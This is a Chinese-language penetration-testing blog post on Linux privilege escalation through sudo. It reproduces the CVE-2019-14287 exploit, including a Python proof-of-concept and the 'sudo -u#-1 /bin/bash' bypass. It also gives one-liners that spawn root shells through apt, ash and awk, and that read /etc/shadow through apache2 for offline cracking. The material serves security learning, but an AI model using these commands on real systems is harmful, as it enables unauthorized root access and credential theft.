linux提权之sudo风暴

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~
✨主攻领域：【渗透领域】【应急响应】 【Java】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限，欢迎各位大佬指点，相互学习进步！

---

目录

前言

1、CVE-2019-14287漏洞

2、sudo apt

3、sudo apache2

4、sudo ash

5、sudo awk

---

前言

【「红队笔记」Linux提权精讲：Sudo风暴 - Sudo风暴全70讲，扫地僧级别心法，研究提权技术的同时，打磨你对linux内核的深度理解。渗透测试宝典。】 「红队笔记」Linux提权精讲：Sudo风暴 - Sudo风暴全70讲，扫地僧级别心法，研究提权技术的同时，打磨你对linux内核的深度理解。渗透测试宝典。_哔哩哔哩_bilibili

1、CVE-2019-14287漏洞

sudo提权，利用 下面的不用密码直接执行 /bin/bash 然后拿root权限

sudo -u#-1 /bin/bash

在exploit上面也可以找到

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical HackersThe Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.https://www.exploit-db.com/

我们可以看到下面Exploit 里面的介绍和漏洞演示：

这是一个关于 sudo 版本 1.8.27 存在安全绕过漏洞的 exploit。这个漏洞可以被利用来绕过 sudo 的限制，允许未经授权的用户以 root 用户执行特权命令。

这个漏洞由 Joe Vennix 发现并分析，Exploit 作者是 Mohin Paramasivam。该漏洞编号为 CVE-2019-14287，影响版本为 <1.8.28。建议所有用户升级到修复此问题的 sudo 版本 1.8.28。

sudo -v |grep version  //查看sudo版本

# Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo <1.8.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : 2019-14287'''Check for the user sudo permissionssudo -l User hacker may run the following commands on kali:(ALL, !root) /bin/bashSo user hacker can't run /bin/bash as root (!root)User hacker sudo privilege in /etc/sudoers# User privilege specification
root    ALL=(ALL:ALL) ALLhacker ALL=(ALL,!root) /bin/bashWith ALL specified, user hacker can run the binary /bin/bash as any userEXPLOIT: sudo -u#-1 /bin/bashExample : hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's idand /bin/bash is executed with root permission
Proof of Concept Code :How to use :
python3 sudo_exploit.py'''#!/usr/bin/python3import os#Get current usernameusername = input("Enter current username :")#check which binary the user can run with sudoos.system("sudo -l > priv")os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")binary_file = open("binary")binary= binary_file.read()#execute sudo exploitprint("Lets hope it works")os.system("sudo -u#-1 "+ binary)

2、sudo apt

通过sudo -l 命令，发现存在apt提权，然后输入下面的命令，就可以拿到root权限了

sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh

apt | GTFOBins https://gtfobins.github.io/gtfobins/apt/#sudo

3、sudo apache2

sudo apache2 -f /etc/shadow  //列出错误的root哈希值

利用john进行爆破

4、sudo ash

发现ash，因为ash本身就是一个shell，所以我们直接sudo ash就可以拿到root权限了

5、sudo awk

查看sudo提权，发现awk存在

sudo awk 'BEGIN {system("/bin/sh")}'